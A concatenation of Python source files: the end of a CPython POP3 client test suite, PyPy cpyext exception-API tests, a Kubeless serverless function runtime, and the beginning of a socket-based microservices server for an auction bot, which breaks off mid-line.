self.assertEqual(self.client.top(1, 1), expected) def test_uidl(self): self.client.uidl() self.client.uidl('foo') def test_utf8_raises_if_unsupported(self): self.server.handler.enable_UTF8 = False self.assertRaises(poplib.error_proto, self.client.utf8) def test_utf8(self): self.server.handler.enable_UTF8 = True expected = b'+OK I know RFC6856' result = self.client.utf8() self.assertEqual(result, expected) def test_capa(self): capa = self.client.capa() self.assertTrue('IMPLEMENTATION' in capa.keys()) def test_quit(self): resp = self.client.quit() self.assertTrue(resp) self.assertIsNone(self.client.sock) self.assertIsNone(self.client.file) @requires_ssl def test_stls_capa(self): capa = self.client.capa() self.assertTrue('STLS' in capa.keys()) @requires_ssl def test_stls(self): expected = b'+OK Begin TLS negotiation' resp = self.client.stls() self.assertEqual(resp, expected) @requires_ssl def test_stls_context(self): expected = b'+OK Begin TLS negotiation' ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) ctx.load_verify_locations(CAFILE) self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED) self.assertEqual(ctx.check_hostname, True) with self.assertRaises(ssl.CertificateError): resp = self.client.stls(context=ctx) self.client = poplib.POP3("localhost", self.server.port, timeout=3) resp = self.client.stls(context=ctx) self.assertEqual(resp, expected) if SUPPORTS_SSL: from test.test_ftplib import SSLConnection class DummyPOP3_SSLHandler(SSLConnection, DummyPOP3Handler): def __init__(self, conn): asynchat.async_chat.__init__(self, conn) self.secure_connection() self.set_terminator(b"\r\n") self.in_buffer = [] self.push('+OK dummy pop3 server ready. <timestamp>') self.tls_active = True self.tls_starting = False @requires_ssl class TestPOP3_SSLClass(TestPOP3Class): # repeat previous tests by using poplib.POP3_SSL def setUp(self): self.server = DummyPOP3Server((HOST, PORT)) self.server.handler = DummyPOP3_SSLHandler self.server.start() self.client = poplib.POP3_SSL(self.server.host, self.server.port) def test__all__(self): self.assertIn('POP3_SSL', poplib.__all__) def test_context(self): ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE self.assertRaises(ValueError, poplib.POP3_SSL, self.server.host, self.server.port, keyfile=CERTFILE, context=ctx) self.assertRaises(ValueError, poplib.POP3_SSL, self.server.host, self.server.port, certfile=CERTFILE, context=ctx) self.assertRaises(ValueError, poplib.POP3_SSL, self.server.host, self.server.port, keyfile=CERTFILE, certfile=CERTFILE, context=ctx) self.client.quit() self.client = poplib.POP3_SSL(self.server.host, self.server.port, context=ctx) self.assertIsInstance(self.client.sock, ssl.SSLSocket) self.assertIs(self.client.sock.context, ctx) self.assertTrue(self.client.noop().startswith(b'+OK')) def test_stls(self): self.assertRaises(poplib.error_proto, self.client.stls) test_stls_context = test_stls def test_stls_capa(self): capa = self.client.capa() self.assertFalse('STLS' in capa.keys()) @requires_ssl class TestPOP3_TLSClass(TestPOP3Class): # repeat previous tests by using poplib.POP3.stls() def setUp(self): self.server = DummyPOP3Server((HOST, PORT)) self.server.start() self.client = poplib.POP3(self.server.host, self.server.port, timeout=3) self.client.stls() def tearDown(self): if self.client.file is not None and self.client.sock is not None: try: self.client.quit() except poplib.error_proto: # happens in the test_too_long_lines case; the overlong # response will be treated as response to QUIT and raise # this exception self.client.close() self.server.stop() # Explicitly clear the attribute to prevent dangling thread self.server = None def test_stls(self): self.assertRaises(poplib.error_proto, self.client.stls) test_stls_context = test_stls def test_stls_capa(self): capa = self.client.capa() self.assertFalse(b'STLS' in capa.keys()) class TestTimeouts(TestCase): def setUp(self): self.evt = threading.Event() self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.sock.settimeout(60) # Safety net. Look issue 11812 self.port = test_support.bind_port(self.sock) self.thread = threading.Thread(target=self.server, args=(self.evt,self.sock)) self.thread.setDaemon(True) self.thread.start() self.evt.wait() def tearDown(self): self.thread.join() # Explicitly clear the attribute to prevent dangling thread self.thread = None def server(self, evt, serv): serv.listen() evt.set() try: conn, addr = serv.accept() conn.send(b"+ Hola mundo\n") conn.close() except socket.timeout: pass finally: serv.close() def testTimeoutDefault(self): self.assertIsNone(socket.getdefaulttimeout()) socket.setdefaulttimeout(30) try: pop = poplib.POP3(HOST, self.port) finally: socket.setdefaulttimeout(None) self.assertEqual(pop.sock.gettimeout(), 30) pop.close() def testTimeoutNone(self): self.assertIsNone(socket.getdefaulttimeout()) socket.setdefaulttimeout(30) try: pop = poplib.POP3(HOST, self.port, timeout=None) finally: socket.setdefaulttimeout(None) self.assertIsNone(pop.sock.gettimeout()) pop.close() def testTimeoutValue(self): pop = poplib.POP3(HOST, self.port, timeout=30) self.assertEqual(pop.sock.gettimeout(), 30) pop.close() def test_main(): tests = [TestPOP3Class, TestTimeouts, TestPOP3_SSLClass, TestPOP3_TLSClass] thread_info = test_support.threading_setup() try: test_support.run_unittest(*tests) finally: test_support.threading_cleanup(*thread_info) if __name__ == '__main__': test_main()
test_pyerrors.py
import pytest import sys import StringIO from pypy.module.cpyext.state import State from pypy.module.cpyext.test.test_api import BaseApiTest from pypy.module.cpyext.test.test_cpyext import AppTestCpythonExtensionBase from rpython.rtyper.lltypesystem import rffi class TestExceptions(BaseApiTest): def test_GivenExceptionMatches(self, space, api): exc_matches = api.PyErr_GivenExceptionMatches string_exception = space.wrap('exception') instance = space.call_function(space.w_ValueError) assert exc_matches(string_exception, string_exception) assert exc_matches(instance, space.w_ValueError) assert exc_matches(space.w_ValueError, space.w_ValueError) assert exc_matches(space.w_IndexError, space.w_LookupError) assert not exc_matches(space.w_ValueError, space.w_LookupError) exceptions = space.newtuple([space.w_LookupError, space.w_ValueError]) assert exc_matches(space.w_ValueError, exceptions) def test_ExceptionMatches(self, space, api): api.PyErr_SetObject(space.w_ValueError, space.wrap("message")) assert api.PyErr_ExceptionMatches(space.w_Exception) assert api.PyErr_ExceptionMatches(space.w_ValueError) assert not api.PyErr_ExceptionMatches(space.w_TypeError) api.PyErr_Clear() def test_Occurred(self, space, api): assert not api.PyErr_Occurred() string = rffi.str2charp("spam and eggs") api.PyErr_SetString(space.w_ValueError, string) rffi.free_charp(string) assert api.PyErr_Occurred() is space.w_ValueError api.PyErr_Clear() def test_SetObject(self, space, api): api.PyErr_SetObject(space.w_ValueError, space.wrap("a value")) assert api.PyErr_Occurred() is space.w_ValueError state = space.fromcache(State) operror = state.get_exception() assert space.eq_w(operror.get_w_value(space), space.wrap("a value")) api.PyErr_Clear() def test_SetNone(self, space, api): api.PyErr_SetNone(space.w_KeyError) state = space.fromcache(State) operror = state.get_exception() assert space.eq_w(operror.w_type, space.w_KeyError) assert space.eq_w(operror.get_w_value(space), space.w_None) api.PyErr_Clear() api.PyErr_NoMemory() operror = state.get_exception() assert space.eq_w(operror.w_type, space.w_MemoryError) api.PyErr_Clear() def test_Warning(self, space, api, capfd): message = rffi.str2charp("this is a warning") api.PyErr_WarnEx(None, message, 1) space.call_method(space.sys.get('stderr'), "flush") out, err = capfd.readouterr() assert ": UserWarning: this is a warning" in err rffi.free_charp(message) def test_print_err(self, space, api, capfd): api.PyErr_SetObject(space.w_Exception, space.wrap("cpyext is cool")) api.PyErr_Print() space.call_method(space.sys.get('stderr'), "flush") out, err = capfd.readouterr() assert "cpyext is cool" in err assert not api.PyErr_Occurred() def test_WriteUnraisable(self, space, api, capfd): api.PyErr_SetObject(space.w_ValueError, space.wrap("message")) w_where = space.wrap("location") api.PyErr_WriteUnraisable(w_where) space.call_method(space.sys.get('stderr'), "flush") out, err = capfd.readouterr() assert "Exception ignored in: 'location'\nValueError: message" == err.strip() @pytest.mark.skipif(True, reason='not implemented yet') def test_interrupt_occurred(self, space, api): assert not api.PyOS_InterruptOccurred() import signal, os recieved = [] def default_int_handler(*args): recieved.append('ok') signal.signal(signal.SIGINT, default_int_handler) os.kill(os.getpid(), signal.SIGINT) assert recieved == ['ok'] assert api.PyOS_InterruptOccurred() class AppTestFetch(AppTestCpythonExtensionBase): def setup_class(cls): from pypy.interpreter.test.test_fsencode import get_special_char space = cls.space cls.special_char = get_special_char() cls.w_special_char = space.wrap(cls.special_char) AppTestCpythonExtensionBase.setup_class.im_func(cls) def test_occurred(self): module = self.import_extension('foo', [ ("check_error", "METH_NOARGS", ''' PyErr_SetString(PyExc_TypeError, "message"); PyErr_Occurred(); PyErr_Clear(); Py_RETURN_TRUE; ''' ), ]) assert module.check_error() def test_fetch_and_restore(self): module = self.import_extension('foo', [ ("check_error", "METH_NOARGS", ''' PyObject *type, *val, *tb; PyErr_SetString(PyExc_TypeError, "message"); PyErr_Fetch(&type, &val, &tb); if (PyErr_Occurred()) return NULL; if (type != PyExc_TypeError) Py_RETURN_FALSE; PyErr_Restore(type, val, tb); if (!PyErr_Occurred()) Py_RETURN_FALSE; PyErr_Clear(); Py_RETURN_TRUE; ''' ), ]) assert module.check_error() def test_normalize(self): module = self.import_extension('foo', [ ("check_error", "METH_NOARGS", ''' PyObject *type, *val, *tb; PyErr_SetString(PyExc_TypeError, "message"); PyErr_Fetch(&type, &val, &tb); if (type != PyExc_TypeError) Py_RETURN_FALSE; if (!PyUnicode_Check(val)) Py_RETURN_FALSE; /* Normalize */ PyErr_NormalizeException(&type, &val, &tb); if (type != PyExc_TypeError) Py_RETURN_FALSE; if ((PyObject*)Py_TYPE(val) != PyExc_TypeError) Py_RETURN_FALSE; /* Normalize again */ PyErr_NormalizeException(&type, &val, &tb); if (type != PyExc_TypeError) Py_RETURN_FALSE; if ((PyObject*)Py_TYPE(val) != PyExc_TypeError) Py_RETURN_FALSE; PyErr_Restore(type, val, tb); PyErr_Clear(); Py_RETURN_TRUE; ''' ), ]) assert module.check_error() def test_normalize_no_exception(self): module = self.import_extension('foo', [ ("check_error", "METH_NOARGS", ''' PyObject *type, *val, *tb; PyErr_Fetch(&type, &val, &tb); if (type != NULL) Py_RETURN_FALSE; if (val != NULL) Py_RETURN_FALSE; PyErr_NormalizeException(&type, &val, &tb); Py_RETURN_TRUE; ''' ), ]) assert module.check_error() def test_SetFromErrno(self): import sys if sys.platform != 'win32': skip("callbacks through ll2ctypes modify errno") import errno, os module = self.import_extension('foo', [ ("set_from_errno", "METH_NOARGS", ''' errno = EBADF; PyErr_SetFromErrno(PyExc_OSError); return NULL; '''), ], prologue="#include <errno.h>") try: module.set_from_errno() except OSError as e: assert e.errno == errno.EBADF assert e.strerror == os.strerror(errno.EBADF) assert e.filename is None def test_SetFromErrnoWithFilename(self): char = self.special_char if char is None: char = "a" # boring import errno, os module = self.import_extension('foo', [ ("set_from_errno", "METH_NOARGS", ''' errno = EBADF; PyErr_SetFromErrnoWithFilename(PyExc_OSError, "/path/to/file"); return NULL; '''), ("set_from_errno_special", "METH_NOARGS", ''' errno = EBADF; PyErr_SetFromErrnoWithFilename(PyExc_OSError, "/path/to/%s"); return NULL; ''' % (char, )), ], prologue="#include <errno.h>") exc_info = raises(OSError, module.set_from_errno) assert exc_info.value.filename == "/path/to/file" assert exc_info.value.errno == errno.EBADF assert exc_info.value.strerror == os.strerror(errno.EBADF) exc_info = raises(OSError, module.set_from_errno_special) assert exc_info.value.filename == "/path/to/%s" % (char, ) assert exc_info.value.errno == errno.EBADF assert exc_info.value.strerror == os.strerror(errno.EBADF) def test_SetFromErrnoWithFilename_NULL(self): import errno, os module = self.import_extension('foo', [ ("set_from_errno", "METH_NOARGS", ''' errno = EBADF; PyErr_SetFromErrnoWithFilename(PyExc_OSError, NULL); return NULL; '''), ], prologue="#include <errno.h>") exc_info = raises(OSError, module.set_from_errno) assert exc_info.value.filename is None assert exc_info.value.errno == errno.EBADF assert exc_info.value.strerror == os.strerror(errno.EBADF) def test_SetFromErrnoWithFilenameObject__PyUnicode(self): import errno, os module = self.import_extension('foo', [ ("set_from_errno", "METH_NOARGS", ''' PyObject *filenameObject = PyUnicode_FromString("/path/to/file"); errno = EBADF; PyErr_SetFromErrnoWithFilenameObject(PyExc_OSError, filenameObject); Py_DECREF(filenameObject); return NULL; '''), ], prologue="#include <errno.h>") exc_info = raises(OSError, module.set_from_errno) assert exc_info.value.filename == "/path/to/file" assert exc_info.value.errno == errno.EBADF assert exc_info.value.strerror == os.strerror(errno.EBADF) def test_SetFromErrnoWithFilenameObject__PyLong(self): import errno, os module = self.import_extension('foo', [ ("set_from_errno", "METH_NOARGS", ''' PyObject *intObject = PyLong_FromLong(3); errno = EBADF; PyErr_SetFromErrnoWithFilenameObject(PyExc_OSError, intObject); Py_DECREF(intObject); return NULL; '''), ], prologue="#include <errno.h>") exc_info = raises(OSError, module.set_from_errno) assert exc_info.value.filename == 3 assert exc_info.value.errno == errno.EBADF assert exc_info.value.strerror == os.strerror(errno.EBADF) def test_SetFromErrnoWithFilenameObject__PyList(self): import errno, os module = self.import_extension('foo', [ ("set_from_errno", "METH_NOARGS", ''' PyObject *lst = Py_BuildValue("[iis]", 1, 2, "three"); errno = EBADF; PyErr_SetFromErrnoWithFilenameObject(PyExc_OSError, lst); Py_DECREF(lst); return NULL; '''), ], prologue="#include <errno.h>") exc_info = raises(OSError, module.set_from_errno) assert exc_info.value.filename == [1, 2, "three"] assert exc_info.value.errno == errno.EBADF assert exc_info.value.strerror == os.strerror(errno.EBADF) def test_SetFromErrnoWithFilenameObject__PyTuple(self): import errno, os module = self.import_extension('foo', [ ("set_from_errno", "METH_NOARGS", ''' PyObject *tuple = Py_BuildValue("(iis)", 1, 2, "three"); errno = EBADF; PyErr_SetFromErrnoWithFilenameObject(PyExc_OSError, tuple); Py_DECREF(tuple); return NULL; '''), ], prologue="#include <errno.h>") exc_info = raises(OSError, module.set_from_errno) assert exc_info.value.filename == (1, 2, "three") assert exc_info.value.errno == errno.EBADF assert exc_info.value.strerror == os.strerror(errno.EBADF) def test_SetFromErrnoWithFilenameObject__Py_None(self): import errno, os module = self.import_extension('foo', [ ("set_from_errno", "METH_NOARGS", ''' PyObject *none = Py_BuildValue(""); errno = EBADF; PyErr_SetFromErrnoWithFilenameObject(PyExc_OSError, none); Py_DECREF(none); return NULL; '''), ], prologue="#include <errno.h>") exc_info = raises(OSError, module.set_from_errno) assert exc_info.value.filename is None assert exc_info.value.errno == errno.EBADF assert exc_info.value.strerror == os.strerror(errno.EBADF) def test_PyErr_Display(self): from sys import version_info if self.runappdirect and (version_info.major < 3 or version_info.minor < 3): skip('PyErr_{GS}etExcInfo introduced in python 3.3') module = self.import_extension('foo', [ ("display_error", "METH_VARARGS", r''' PyObject *type, *val, *tb; PyErr_GetExcInfo(&type, &val, &tb); PyErr_Display(type, val, tb); Py_XDECREF(type); Py_XDECREF(val); Py_XDECREF(tb); Py_RETURN_NONE; '''), ]) import io, sys sys.stderr = io.StringIO() try: 1 / 0 except ZeroDivisionError: module.display_error() finally: output = sys.stderr.getvalue() sys.stderr = sys.__stderr__ assert "in test_PyErr_Display\n" in output assert "ZeroDivisionError" in output @pytest.mark.skipif(True, reason= "XXX seems to pass, but doesn't: 'py.test -s' shows errors in PyObject_Free") def test_GetSetExcInfo(self): import sys if self.runappdirect and (sys.version_info.major < 3 or sys.version_info.minor < 3): skip('PyErr_{GS}etExcInfo introduced in python 3.3') module = self.import_extension('foo', [ ("getset_exc_info", "METH_VARARGS", r''' PyObject *type, *val, *tb; PyObject *new_type, *new_val, *new_tb; PyObject *result; if (!PyArg_ParseTuple(args, "OOO", &new_type, &new_val, &new_tb)) return NULL; PyErr_GetExcInfo(&type, &val, &tb); Py_INCREF(new_type); Py_INCREF(new_val); Py_INCREF(new_tb); PyErr_SetExcInfo(new_type, new_val, new_tb); result = Py_BuildValue("OOO", type ? type : Py_None, val ? val : Py_None, tb ? tb : Py_None); Py_XDECREF(type); Py_XDECREF(val); Py_XDECREF(tb); return result; ''' ), ]) try: raise ValueError(5) except ValueError as old_exc: new_exc = TypeError("TEST") orig_sys_exc_info = sys.exc_info() orig_exc_info = module.getset_exc_info(new_exc.__class__, new_exc, None) new_sys_exc_info = sys.exc_info() new_exc_info = module.getset_exc_info(*orig_exc_info) reset_sys_exc_info = sys.exc_info() assert orig_exc_info[0] is old_exc.__class__ assert orig_exc_info[1] is old_exc assert orig_exc_info == orig_sys_exc_info assert orig_exc_info == reset_sys_exc_info assert new_exc_info == (new_exc.__class__, new_exc, None) assert new_exc_info == new_sys_exc_info def test_PyErr_WarnFormat(self): import warnings module = self.import_extension('foo', [ ("test", "METH_NOARGS", ''' PyErr_WarnFormat(PyExc_UserWarning, 1, "foo %d bar", 42); Py_RETURN_NONE; '''), ]) with warnings.catch_warnings(record=True) as l: module.test() assert len(l) == 1 assert "foo 42 bar" in str(l[0]) def test_StopIteration_value(self): module = self.import_extension('foo', [ ("test", "METH_O", ''' PyObject *o = ((PyStopIterationObject *)args)->value; Py_INCREF(o); return o; '''), ]) res = module.test(StopIteration("foo!")) assert res == "foo!" def test_PyErr_BadInternalCall(self): # NB. it only seemed to fail when run with '-s'... but I think # that it always printed stuff to stderr module = self.import_extension('foo', [ ("oops", "METH_NOARGS", r''' PyErr_BadInternalCall(); return NULL; '''), ]) raises(SystemError, module.oops) @pytest.mark.skipif("not config.option.runappdirect", reason='-A only') def test_error_thread_race(self): # Check race condition: thread 0 returns from cpyext with error set, # after thread 1 has set an error but before it returns. module = self.import_extension('foo', [ ("emit_error", "METH_VARARGS", ''' PyThreadState *save = NULL; PyGILState_STATE gilsave; /* NB. synchronization due to GIL */ static volatile int flag = 0; int id; if (!PyArg_ParseTuple(args, "i", &id)) return NULL; /* Proceed in thread 1 first */ save = PyEval_SaveThread(); while (id == 0 && flag == 0); gilsave = PyGILState_Ensure(); PyErr_Format(PyExc_ValueError, "%d", id); /* Proceed in thread 0 first */ if (id == 1) flag = 1; PyGILState_Release(gilsave); while (id == 1 && flag == 1); PyEval_RestoreThread(save); if (id == 0) flag = 0; return NULL; ''' ), ]) import threading failures = [] def worker(arg): try: module.emit_error(arg) failures.append(True) except Exception as exc: if str(exc) != str(arg): failures.append(exc) threads = [threading.Thread(target=worker, args=(j,)) for j in (0, 1)] for t in threads: t.start() for t in threads: t.join() assert not failures
kubeless.py
#!/usr/bin/env python import importlib import os import queue import threading import bottle import prometheus_client as prom import sys import tracing from ce import Event from tracing import set_req_context def create_service_name(pod_name: str, service_namespace: str) -> str: # remove generated pods suffix ( two last sections ) deployment_name = '-'.join(pod_name.split('-')[0:pod_name.count('-') - 1]) return '.'.join([deployment_name, service_namespace]) # The reason this file has an underscore prefix in its name is to avoid a # name collision with the user-defined module. module_name = os.getenv('MOD_NAME') if module_name is None: print('MOD_NAME have to be provided', flush=True) exit(1) current_mod = os.path.basename(__file__).split('.')[0] if module_name == current_mod: print('Module cannot be named {} as current module'.format(current_mod), flush=True) exit(2) sys.path.append('/kubeless') mod = importlib.import_module(module_name) func_name = os.getenv('FUNC_HANDLER') if func_name is None: print('FUNC_HANDLER have to be provided', flush=True) exit(3) func = getattr(mod, os.getenv('FUNC_HANDLER')) func_port = os.getenv('FUNC_PORT', 8080) timeout = float(os.getenv('FUNC_TIMEOUT', 180)) memfile_max = int(os.getenv('FUNC_MEMFILE_MAX', 100 * 1024 * 1024)) bottle.BaseRequest.MEMFILE_MAX = memfile_max app = application = bottle.app() function_context = { 'function-name': func.__name__, 'timeout': timeout, 'runtime': os.getenv('FUNC_RUNTIME'), 'memory-limit': os.getenv('FUNC_MEMORY_LIMIT'), } jaeger_endpoint = os.getenv('JAEGER_SERVICE_ENDPOINT') pod_name = os.getenv('HOSTNAME') service_namespace = os.getenv('SERVICE_NAMESPACE') service_name = create_service_name(pod_name, service_namespace) tracer_provider = None # To not create several tracer providers, when the server start forking. if __name__ == "__main__": tracer_provider = tracing.ServerlessTracerProvider(jaeger_endpoint, service_name) def func_with_context(e, function_context): ex = e.ceHeaders["extensions"] with set_req_context(ex["request"]): return func(e, function_context) @app.get('/healthz') def healthz(): return 'OK' @app.get('/metrics') def metrics(): bottle.response.content_type = prom.CONTENT_TYPE_LATEST return prom.generate_latest(prom.REGISTRY) @app.error(500) def exception_handler(): return 'Internal server error' @app.route('/<:re:.*>', method=['GET', 'POST', 'PATCH', 'DELETE']) def handler(): req = bottle.request tracer = tracer_provider.get_tracer(req) event = Event(req, tracer) method = req.method func_calls.labels(method).inc() with func_errors.labels(method).count_exceptions(): with func_hist.labels(method).time(): que = queue.Queue() t = threading.Thread(target=lambda q, e: q.put(func_with_context(e, function_context)), args=(que, event)) t.start() try: res = que.get(block=True, timeout=timeout) except queue.Empty: return bottle.HTTPError(408, "Timeout while processing the function") else: t.join() return res def preload(): """This is a no-op function used to start the forkserver.""" pass if __name__ == '__main__': import logging import multiprocessing as mp import requestlogger mp_context = os.getenv('MP_CONTEXT', 'forkserver') if mp_context == "fork": raise ValueError( '"fork" multiprocessing context is not supported because cherrypy is a ' 'multithreaded server and safely forking a multithreaded process is ' 'problematic' ) if mp_context not in ["forkserver", "spawn"]: raise ValueError( f'"{mp_context}" is an invalid multiprocessing context. Possible values ' 'are "forkserver" and "spawn"' ) try: ctx = mp.get_context(mp_context) if ctx.get_start_method() == 'forkserver': # Preload the current module and consequently also the user-defined module # so that all the child processes forked from the forkserver in response to # a request immediately have access to the global data in the user-defined # module without having to load it for every request. ctx.set_forkserver_preload([current_mod]) # Start the forkserver before we start accepting requests. d = ctx.Process(target=preload) d.start() d.join() except ValueError: # Default to 'spawn' if 'forkserver' is unavailable. ctx = mp.get_context('spawn') logging.warn( f'"{mp_context}" multiprocessing context is unavailable. Using "spawn"' ) func_hist = prom.Histogram( 'function_duration_seconds', 'Duration of user function in seconds', ['method'] ) func_calls = prom.Counter( 'function_calls_total', 'Number of calls to user function', ['method'] ) func_errors = prom.Counter( 'function_failures_total', 'Number of exceptions in user function', ['method'] ) # added by Kyma team if os.getenv('KYMA_INTERNAL_LOGGER_ENABLED'): # default that has been used so far loggedapp = requestlogger.WSGILogger( app, [logging.StreamHandler(stream=sys.stdout)], requestlogger.ApacheFormatter(), ) else: loggedapp = app # end of modified section bottle.run( loggedapp, server='cherrypy', host='0.0.0.0', port=func_port, # Set this flag to True to auto-reload the server after any source files change reloader=os.getenv('CHERRYPY_RELOADED', False), # Number of requests that can be handled in parallel (default = 50). numthreads=int(os.getenv('CHERRYPY_NUMTHREADS', 50)), quiet='KYMA_BOTTLE_QUIET_OPTION_DISABLED' not in os.environ, )
main_microservices_server.py
#Policy """ ! : means command for the microservices main server > : means requests for nonexisting Communication, request an verification output $ : answer to an existing Communication * : Means an issue/error V : is validation (like when the server confirms request's receiving) CLOSE : sent when a socket is closed by !DISCONNECT Structure for answers (V or $): V """ import socket import threading import logging import logging.handlers import time import sys PORT_SERV = 5050 PORT_CLIENT = 5051 HEADER = 64 HOST = "localhost" FORMAT = "utf-8" from os import getcwd if getcwd() == "C:\\Users\\lucie\\Documents\\Projets code\\auction-bot-rewrite": logs_directory = "C:/Users/lucie/Documents/Projets code/auction-bot-rewrite/logs/" else: logs_directory = "/home/ubuntu/logs/" #init the handlers r_file_handler_info = logging.handlers.RotatingFileHandler( filename=logs_directory + 'MMS_info.log', mode='a', maxBytes=5*1024*1024, backupCount=1, encoding="utf-8", delay=0 ) r_file_handler_info.setLevel(logging.INFO) r_file_handler_debug = logging.handlers.RotatingFileHandler( filename=logs_directory + 'MMS_debug.log', mode='a', maxBytes=3*1024*1024, backupCount=1, encoding="utf-8", delay=0 ) r_file_handler_debug.setLevel(logging.DEBUG) r_file_handler_all_warn = logging.handlers.RotatingFileHandler( filename=logs_directory + 'all_warn.log', mode='a', maxBytes=4*1024*1024, backupCount=1, encoding="utf-8", delay=0 ) r_file_handler_all_warn.setLevel(logging.WARNING) socket_handler = logging.handlers.SocketHandler("localhost", 5060) socket_handler.setLevel(logging.WARNING) #a "print" handler stdout_handler = logging.StreamHandler(sys.stdout) formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s') r_file_handler_debug.setFormatter(formatter) r_file_handler_info.setFormatter(formatter) r_file_handler_all_warn.setFormatter(formatter) stdout_handler.setFormatter(formatter) socket_handler.setFormatter(formatter) def init_a_new_logger(name, lvl=logging.DEBUG): #init the logger logger = logging.getLogger(name) logger.setLevel(lvl) #linking the handlers logger.addHandler(r_file_handler_info) logger.addHandler(r_file_handler_debug) logger.addHandler(r_file_handler_all_warn) logger.addHandler(socket_handler) #adding a "print" handler logger.addHandler(stdout_handler) return logger """class CallableMicroServices: def __init__(self): self.dict = {} self.microservices_types = ("discord_bot", "hypixel_api_analysis") def get_microservice(self, microservice_name): if microservice_name in self.dict: return self.dict[microservice_name] else: return None #can be considered as False in the future def add_microservice(self, microservice_name, microservice_obj): if microservice_name in self.microservices_types: #will also overwrites the existing microservice with same name self.dict[microservice_name] = microservice_obj return True else: logger.error("CallableMicroServices -> add_microservices : not in the microservies_types list") return False def destroy_microservice(self, microservice_obj): key_to_destroy = None for key, value in self.dict.items(): if value == microservice_obj: key_to_destroy = key if key_to_destroy is not None: self.dict.pop(key_to_destroy)""" logger = init_a_new_logger("Global MMS") class Microservice: microservices_dict = {} microservices_types = ("discord_bot", "hypixel_api_analysis") @classmethod def get_microservice(cls, microservice_name): if microservice_name in cls.microservices_dict: return cls.microservices_dict[microservice_name] else: return None #can be considered as False in the future @classmethod def add_microservice(cls, microservice_name, send_socket=None): if microservice_name in cls.microservices_types: #will also overwrites the existing microservice with same name microservice = cls.get_microservice(microservice_name) if microservice is None: microservice = Microservice(microservice_name, send_socket) if send_socket is not None: microservice.change_socket(send_socket) microservice.alive = True return microservice else: logger.error("CallableMicroServices -> add_microservices : not in the microservies_types list") return None @classmethod def set_microservice_in_dict(cls, key, value): cls.microservices_dict[key] = value @classmethod def destroy_microservice(cls, microservice_obj): microservice_obj.close_socket() key_to_destroy = None for key, value in cls.microservices_dict.items(): if value == microservice_obj: key_to_destroy = key if key_to_destroy is not None: cls.microservices_dict.pop(key_to_destroy) def __init__(self, name, send_socket=None): logger.info(f"Initializing {name} microservice") self.last_listening_connexion_etablished = time.time() self.name = name self.alive = True self.is_sending = False #if the socket is currently used self.send_socket = send_socket existing_microservice = self.get_microservice(name) if existing_microservice is not None: #so there is still an existing microservice objet for this one, overwrites it del(existing_microservice) self.set_microservice_in_dict(name, self) def destroy(self): self.destroy_microservice(self) self.alive = False def close_socket(self, socket_to_close="self"): if socket_to_close == "self": socket_to_close = self.send_socket if self.send_socket is socket_to_close: try: socket_to_close.send(str(len("CLOSE".encode(FORMAT))).encode(FORMAT)) socket_to_close.send("CLOSE".encode(FORMAT)) except: logger.info("didn't succeeded in send CLOSE state") if self.send_socket is not None: self.send_socket.close() self.send_socket = None del(socket_to_close) def change_socket(self, send_socket): if self.send_socket is not None: #overwrites self.send_socket.close() self.send_socket = send_socket self.is_sending = False """def add_communication(self, communication): if communication not in self.communications: self.communications.append(communication)""" def ask_alive(self): content = "alive {}" self.is_sending = True self.send_socket.send(str(len(content)).encode(FORMAT)) resp = self.send_socket.recv(HEADER) #to wait the client to receive the req lenght self.send_socket.send(content) self.is_sending = False if resp is None: self.alive = False else: self.alive = True return self.alive def send(self, content: str): if self.alive is False and self.ask_alive() == False: logger.warning(f"tried to send to a died microservice, sending cancelled") return while self.is_sending: logger.warning(f"waiting for socket stop sending, for {self.name}") time.sleep(0.01) content = content.encode(FORMAT) self.is_sending = True self.send_socket.send(str(len(content)).encode(FORMAT)) self.send_socket.recv(HEADER) #to wait the client to receive the req lenght self.send_socket.send(content) self.is_sending = False class Request: #single request def __init__(self, microservice_src: Microservice, microservice_dest: Microservice, data): self.microservice_src = microservice_src self.microservice_dest = microservice_dest self.data = data def get_src(self): if self.microservice_src.alive: return self.microservice_src else: return False def get_dest(self): if self.microservice_dest.alive: return self.microservice_dest else: return False class Communication: last_id = -1 id_to_communication_object = [] @classmethod def new_id_and_add_to_list(cls, obj): new_id = cls.last_id + 1 cls.last_id = new_id cls.id_to_communication_object.append(obj) return new_id def __init__(self, first_request=None): self.requests = [] if first_request is not None: self.requests = [first_request] self.id = self.new_id_and_add_to_list(self) def add(self, request: Request): self.requests.append(request) def last_speaker(self): if len(self.requests) > 0: return self.requests[-1].get_src() return None server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.bind((HOST, PORT_SERV)) client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) client.bind((HOST, PORT_CLIENT)) def handle_server(conn, addr): #for clientmode, when the other side is mainly receiving and us mainly sending name = conn.recv(128).decode(FORMAT) microservice_obj = Microservice.get_microservice(name) if microservice_obj is None: conn.send("*BAD_NAME_OR_NOT_INITIALIZED".encode(FORMAT)) logger.error(f"client mode bad name or not initialized : {name}") else: #set this socket for commands to this microservice microservice_obj.close_socket() microservice_obj.change_socket(conn) #Confirm the initialization conn.send(name.encode(FORMAT)) microservice_obj.alive = True logger.info(f"{microservice_obj.name} CLIENTmode initialized") def handle_client(conn, addr): #must send its microservice type name = conn.recv(128).decode(FORMAT) microservice_obj = Microservice.add_microservice(name) etablished_time = time.time() microservice_obj.last_listening_connexion_etablished = etablished_time #to prevent died dest if microservice_obj is None: conn.send("*BAD_NAME".encode(FORMAT)) logger.error(f"Init bad name : {name}") return #Confirm the initialization conn.send(name.encode(FORMAT)) logger.info(f"{microservice_obj.name} SERVERmode initialized") while True: try: msg_length = conn.recv(HEADER) microservice_obj.alive = True except: break msg_length = msg_length.decode(FORMAT) if msg_length: #handle None received msg_length = int(msg_length) print("taille reรงue", msg_length) conn.send(str(msg_length).encode(FORMAT)) #to prevent receiving req_lenght and content in same time msg = conn.recv(msg_length).decode(FORMAT) print(f"reรงu {msg}") msg_splitted = msg.split(" ") if msg[0] == "!": #main server commands if msg == "!DISCONNECT": logger.info("Disconnected by customer") microservice_obj.destroy() break else: conn.send("*BAD_SERVER_COMMAND".encode(FORMAT)) logger.warn(f"bad server command : {msg} from {name}") elif msg[0] == ">" or msg[0] == "$": dest = 